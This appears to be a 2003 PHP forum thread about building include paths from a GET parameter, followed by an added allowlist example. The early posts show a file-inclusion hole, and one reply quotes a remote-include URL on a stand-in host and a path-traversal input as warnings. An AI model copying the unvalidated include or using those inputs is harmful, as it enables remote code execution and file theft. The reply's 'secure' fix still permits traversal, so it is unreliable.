
question about using variables

Posted: Thu Mar 20, 2003 3:26 am
by legaxy
I've normally used

Code:

elseif ($HTTP_GET_VARS['page'] === 'calender') {
    require ("calender.php");
}
to do stuff with index.php?page=calender

but in wanting to go a step further I want to try using

Code:

elseif ($HTTP_GET_VARS['page'] === $page) {
    require ("$page .php");
}
where $page is the defined variable, and .php makes that... say calender.php
I've tried using different things for separation, but no success. Any help would be greatly appreciated!!

Posted: Thu Mar 20, 2003 3:33 am
by twigletmac
Something like:

Code:

require $page.'.php';
should work.
So should,

Code:

require "$page.php"; // note no space between $page and .php
Mac

Posted: Thu Mar 20, 2003 3:41 am
by legaxy
Sweet, thanks! The 1st one worked, but the 2nd I had tried before and it returned an error saying can't find

Code:

calender . .php
which was odd
but works now :) thanks,
I'm working on http://www.venturer.org.nz

Posted: Thu Mar 20, 2003 4:19 am
by pootergeist
just a few security notes:

Always (and I mean always always, and not just sometimes always) hardcode a portion of the path to any include file that receives its pointer from the GET array. This is even more important now that PHP 4.3+ supports remote file streaming. Imagine I accessed your page and typed blat.php?page=http://mysite.hack/badbad.script - you would call that badbad.script and execute it on your server. Or ?page=../../hidden_files/pwd.txt - there are so many URL hacks that you should be aware of.

Now - if you had require('include_files/' .$_GET['page']. '.php');
the script would look for 'include_files/http://...... which wouldn't exist -

Also an idea to set a default value if either $_GET['page'] is null, or the file doesn't exist.

Code:

$_GET['page'] = (file_exists('include_files/' .$_GET['page'] .'.php')) ? 'include_files/' .$_GET['page'] .'.php' : 'include_files/default.php';
require_once($_GET['page']);
Much more secure

All that does is check whether a file exists in the include_files dir named $page.php - if it does it includes it - if it doesn't it includes default.php - so no matter what anyone types into the URL a page is always served and you know exactly what page too.
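
An added example, not part of the thread: the include pattern from the post above, tightened so that the page name must match an allowlist and the resolved path must stay inside the include directory, because a hardcoded prefix plus file_exists() still accepts `../` segments. The function name resolve_page, the allowlist contents and the temporary directory are assumptions made for illustration.

```php
<?php
// Added example (not from the thread). Function and variable names are assumptions.

function resolve_page($requested, string $baseDir, array $allowed, string $default = 'default'): string
{
    $fallback = $baseDir . '/' . $default . '.php';

    // A missing parameter, non-string input (?page[]=x) or a name that is
    // not on the allowlist gets the default page.
    if (!is_string($requested) || !in_array($requested, $allowed, true)) {
        return $fallback;
    }

    // Defence in depth: the canonical path must still be inside $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $requested . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return $fallback;
    }
    return $path;
}

// Constructed demo: a throwaway include directory holding two pages.
$dir = sys_get_temp_dir() . '/include_files_' . getmypid();
@mkdir($dir);
file_put_contents("$dir/calender.php", "<?php echo 'calender page';");
file_put_contents("$dir/default.php",  "<?php echo 'default page';");

$allowed = ['calender'];   // constructed allowlist of page names
$inputs  = ['calender', '../../hidden_files/pwd.txt',
            'http://mysite.hack/badbad.script', null];   // values quoted in the thread

foreach ($inputs as $in) {
    $file = resolve_page($in, $dir, $allowed);
    printf("%-40s => %s\n", var_export($in, true), basename($file));
}

// Remove the constructed files again.
array_map('unlink', glob("$dir/*.php"));
rmdir($dir);
```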